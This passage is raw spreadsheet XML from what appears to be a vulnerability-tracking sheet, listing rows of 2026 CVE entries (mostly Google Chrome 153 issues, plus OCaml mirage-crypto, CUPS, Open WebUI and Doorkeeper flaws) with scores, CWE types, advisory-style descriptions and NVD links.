      <c r="I1175" s="5" t="inlineStr"/>
      <c r="J1175" s="5" t="inlineStr"/>
      <c r="K1175" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1175" s="5" t="inlineStr"/>
      <c r="M1175" s="5" t="inlineStr"/>
      <c r="N1175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1175" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1175" s="5" t="inlineStr"/>
      <c r="Q1175" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R1175" s="5" t="inlineStr">
        <is>
          <t>Uninitialized resource in WebGL in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87642</t>
        </is>
      </c>
    </row>
    <row r="1176">
      <c r="A1176" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87651</t>
        </is>
      </c>
      <c r="D1176" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1176" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1176" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1176" s="5" t="inlineStr"/>
      <c r="H1176" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1176" s="5" t="inlineStr"/>
      <c r="J1176" s="5" t="inlineStr"/>
      <c r="K1176" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1176" s="5" t="inlineStr"/>
      <c r="M1176" s="5" t="inlineStr"/>
      <c r="N1176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1176" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1176" s="5" t="inlineStr"/>
      <c r="Q1176" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1176" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Paint in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain cross-origin data via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S1176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87651</t>
        </is>
      </c>
    </row>
    <row r="1177">
      <c r="A1177" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87658</t>
        </is>
      </c>
      <c r="D1177" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1177" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1177" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1177" s="5" t="inlineStr"/>
      <c r="H1177" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1177" s="5" t="inlineStr"/>
      <c r="J1177" s="5" t="inlineStr"/>
      <c r="K1177" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1177" s="5" t="inlineStr"/>
      <c r="M1177" s="5" t="inlineStr"/>
      <c r="N1177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1177" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1177" s="5" t="inlineStr"/>
      <c r="Q1177" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1177" s="5" t="inlineStr">
        <is>
          <t>Information leak in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to obtain cross-origin data via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87658</t>
        </is>
      </c>
    </row>
    <row r="1178">
      <c r="A1178" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87735</t>
        </is>
      </c>
      <c r="D1178" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1178" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1178" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1178" s="5" t="inlineStr"/>
      <c r="H1178" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1178" s="5" t="inlineStr"/>
      <c r="J1178" s="5" t="inlineStr"/>
      <c r="K1178" s="5" t="inlineStr"/>
      <c r="L1178" s="5" t="inlineStr"/>
      <c r="M1178" s="5" t="inlineStr"/>
      <c r="N1178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1178" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1178" s="5" t="inlineStr"/>
      <c r="Q1178" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="R1178" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the mirage-crypto-pk package before 2.3.0 for OCaml. There is an undocumented exception for a small message during RSA decryption or encryption.</t>
        </is>
      </c>
      <c r="S1178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87735</t>
        </is>
      </c>
    </row>
    <row r="1179">
      <c r="A1179" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87736</t>
        </is>
      </c>
      <c r="D1179" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1179" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1179" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1179" s="5" t="inlineStr"/>
      <c r="H1179" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1179" s="5" t="inlineStr"/>
      <c r="J1179" s="5" t="inlineStr"/>
      <c r="K1179" s="5" t="inlineStr"/>
      <c r="L1179" s="5" t="inlineStr"/>
      <c r="M1179" s="5" t="inlineStr"/>
      <c r="N1179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1179" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1179" s="5" t="inlineStr"/>
      <c r="Q1179" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1179" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the mirage-crypto-ec package before 2.3.0 for OCaml. There is an EC public key out-of-bounds read for compressed points.</t>
        </is>
      </c>
      <c r="S1179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87736</t>
        </is>
      </c>
    </row>
    <row r="1180">
      <c r="A1180" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87875</t>
        </is>
      </c>
      <c r="D1180" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1180" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1180" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G1180" s="5" t="inlineStr"/>
      <c r="H1180" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1180" s="5" t="inlineStr"/>
      <c r="J1180" s="5" t="inlineStr"/>
      <c r="K1180" s="5" t="inlineStr"/>
      <c r="L1180" s="5" t="inlineStr"/>
      <c r="M1180" s="5" t="inlineStr"/>
      <c r="N1180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1180" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1180" s="5" t="inlineStr"/>
      <c r="Q1180" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1180" s="5" t="inlineStr">
        <is>
          <t>The cupsUTF32ToUTF8() function in CUPS's cups/transcode.c lacks a source-length bound and can read past the end of the source buffer, resulting in a heap out-of-bounds read. This is reachable via SNMP supply-description parsing in backend/snmp-supplies.c with attacker-controlled content.</t>
        </is>
      </c>
      <c r="S1180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87875</t>
        </is>
      </c>
    </row>
    <row r="1181">
      <c r="A1181" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87994</t>
        </is>
      </c>
      <c r="D1181" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1181" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1181" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1181" s="5" t="inlineStr"/>
      <c r="H1181" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1181" s="5" t="inlineStr"/>
      <c r="J1181" s="5" t="inlineStr"/>
      <c r="K1181" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L1181" s="5" t="inlineStr"/>
      <c r="M1181" s="5" t="inlineStr"/>
      <c r="N1181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1181" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1181" s="5" t="inlineStr"/>
      <c r="Q1181" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R1181" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.5 until 0.11.1, the channel branch of chat_completion in backend/open_webui/main.py checked channel write access and channel membership for a supplied message_id but did not verify that the calling user authored the targeted message. A channel member could use the chat completions endpoint to replace another member's message while preserving the victim as the stored author, altering the conversation record without gaining access to other channels. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S1181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87994</t>
        </is>
      </c>
    </row>
    <row r="1182">
      <c r="A1182" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87997</t>
        </is>
      </c>
      <c r="D1182" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1182" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1182" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1182" s="5" t="inlineStr"/>
      <c r="H1182" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1182" s="5" t="inlineStr"/>
      <c r="J1182" s="5" t="inlineStr"/>
      <c r="K1182" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L1182" s="5" t="inlineStr"/>
      <c r="M1182" s="5" t="inlineStr"/>
      <c r="N1182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1182" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1182" s="5" t="inlineStr"/>
      <c r="Q1182" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R1182" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.10.0 until 0.11.1, POST /api/chat/completions and POST /api/v1/chat/completions in backend/open_webui/main.py copied a client-supplied folder_id into a new chat without applying the folder write-access check used by the dedicated chat routes. An authenticated user who knew a shared folder identifier could inject an attacker-controlled chat into a folder where the user had read-only or no write access, causing the entry to appear to authorized folder readers. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S1182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87997</t>
        </is>
      </c>
    </row>
    <row r="1183">
      <c r="A1183" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1183" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70665</t>
        </is>
      </c>
      <c r="D1183" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E1183" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1183" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1183" s="5" t="inlineStr"/>
      <c r="H1183" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1183" s="5" t="inlineStr"/>
      <c r="J1183" s="5" t="inlineStr"/>
      <c r="K1183" s="5" t="inlineStr"/>
      <c r="L1183" s="5" t="inlineStr"/>
      <c r="M1183" s="5" t="inlineStr"/>
      <c r="N1183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1183" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P1183" s="5" t="inlineStr"/>
      <c r="Q1183" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R1183" s="5" t="inlineStr">
        <is>
          <t>Doorkeeper OpenID Connect implements an OpenID Connect authentication provider for Rails applications on top of Doorkeeper. Prior to 1.10.4, the Dynamic Client Registration (DCR) endpoint persists client-supplied scopes without validating them against the server's configured scope set. Under certain conditions, this allows a self-registered client to obtain scopes beyond what the server intended to grant. In DynamicClientRegistrationController#application_params, the scopes attribute is assigned directly from params[:scope] with no validation against Doorkeeper.configuration.scopes or optional_scopes. Combined with enforce_configured_scopes being off by default and Doorkeeper's ScopeChecker prioritizing application-level scopes over server-level scopes, this creates a privilege escalation path. This issue is fixed in version 1.10.4.</t>
        </is>
      </c>
      <c r="S1183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70665</t>
        </is>
      </c>
    </row>
    <row r="1184">
      <c r="A1184" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87432</t>
        </is>
      </c>
      <c r="D1184" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E1184" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1184" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1184" s="5" t="inlineStr"/>
      <c r="H1184" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1184" s="5" t="inlineStr"/>
      <c r="J1184" s="5" t="inlineStr"/>
      <c r="K1184" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1184" s="5" t="inlineStr"/>
      <c r="M1184" s="5" t="inlineStr"/>
      <c r="N1184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1184" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1184" s="5" t="inlineStr"/>
      <c r="Q1184" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1184" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Navigation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87432</t>
        </is>
      </c>
    </row>
    <row r="1185">
      <c r="A1185" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87465</t>
        </is>
      </c>
      <c r="D1185" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E1185" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1185" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1185" s="5" t="inlineStr"/>
      <c r="H1185" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1185" s="5" t="inlineStr"/>
      <c r="J1185" s="5" t="inlineStr"/>
      <c r="K1185" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1185" s="5" t="inlineStr"/>
      <c r="M1185" s="5" t="inlineStr"/>
      <c r="N1185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1185" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1185" s="5" t="inlineStr"/>
      <c r="Q1185" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1185" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Downloads in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87465</t>
        </is>
      </c>
    </row>
    <row r="1186">
      <c r="A1186" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87472</t>
        </is>
      </c>
      <c r="D1186" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E1186" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1186" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1186" s="5" t="inlineStr"/>
      <c r="H1186" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1186" s="5" t="inlineStr"/>
      <c r="J1186" s="5" t="inlineStr"/>
      <c r="K1186" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1186" s="5" t="inlineStr"/>
      <c r="M1186" s="5" t="inlineStr"/>
      <c r="N1186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1186" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1186" s="5" t="inlineStr"/>
      <c r="Q1186" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R1186" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in FedCM in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87472</t>
        </is>
      </c>
    </row>
    <row r="1187">
      <c r="A1187" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87502</t>
        </is>
      </c>
      <c r="D1187" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E1187" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1187" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1187" s="5" t="inlineStr"/>
      <c r="H1187" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1187" s="5" t="inlineStr"/>
      <c r="J1187" s="5" t="inlineStr"/>
      <c r="K1187" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1187" s="5" t="inlineStr"/>
      <c r="M1187" s="5" t="inlineStr"/>
      <c r="N1187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1187" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1187" s="5" t="inlineStr"/>
      <c r="Q1187" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="R1187" s="5" t="inlineStr">
        <is>
          <t>Confused deputy in Fullscreen in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to spoof UI elements via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S1187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87502</t>
        </is>
      </c>
    </row>
    <row r="1188">
      <c r="A1188" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87538</t>
        </is>
      </c>
      <c r="D1188" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E1188" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1188" s="5" t="inlineStr"/>
      <c r="H1188" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1188" s="5" t="inlineStr"/>
      <c r="J1188" s="5" t="inlineStr"/>
      <c r="K1188" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1188" s="5" t="inlineStr"/>
      <c r="M1188" s="5" t="inlineStr"/>
      <c r="N1188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1188" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1188" s="5" t="inlineStr"/>
      <c r="Q1188" s="5" t="inlineStr">
        <is>
          <t>CWE-1021</t>
        </is>
      </c>
      <c r="R1188" s="5" t="inlineStr">
        <is>
          <t>Clickjacking in Input in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to spoof UI elements via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S1188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87538</t>
        </is>
      </c>
    </row>
    <row r="1189">
      <c r="A1189" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87559</t>
        </is>
      </c>
      <c r="D1189" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E1189" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1189" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1189" s="5" t="inlineStr"/>
      <c r="H1189" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1189" s="5" t="inlineStr"/>
      <c r="J1189" s="5" t="inlineStr"/>
      <c r="K1189" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1189" s="5" t="inlineStr"/>
      <c r="M1189" s="5" t="inlineStr"/>
      <c r="N1189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1189" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1189" s="5" t="inlineStr"/>
      <c r="Q1189" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="R1189" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in UI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87559</t>
        </is>
      </c>
    </row>
    <row r="1190">
      <c r="A1190" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87624</t>
        </is>
      </c>
      <c r="D1190" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E1190" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1190" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1190" s="5" t="inlineStr"/>
      <c r="H1190" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1190" s="5" t="inlineStr"/>
      <c r="J1190" s="5" t="inlineStr"/>
      <c r="K1190" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L1190" s="5" t="inlineStr"/>
      <c r="M1190" s="5" t="inlineStr"/>
      <c r="N1190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1190" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1190" s="5" t="inlineStr"/>
      <c r="Q1190" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="R1190" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Passwords in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to spoof UI elements via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S1190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87624</t>
        </is>
      </c>
    </row>
    <row r="1191">
      <c r="A1191" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87641</t>
        </is>
      </c>
      <c r="D1191" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E1191" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1191" s="5" t="inlineStr"/>
      <c r="H1191" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1191" s="5" t="inlineStr"/>
      <c r="J1191" s="5" t="inlineStr"/>
      <c r="K1191" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1191" s="5" t="inlineStr"/>
      <c r="M1191" s="5" t="inlineStr"/>
      <c r="N1191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1191" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1191" s="5" t="inlineStr"/>
      <c r="Q1191" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R1191" s="5" t="inlineStr">
        <is>
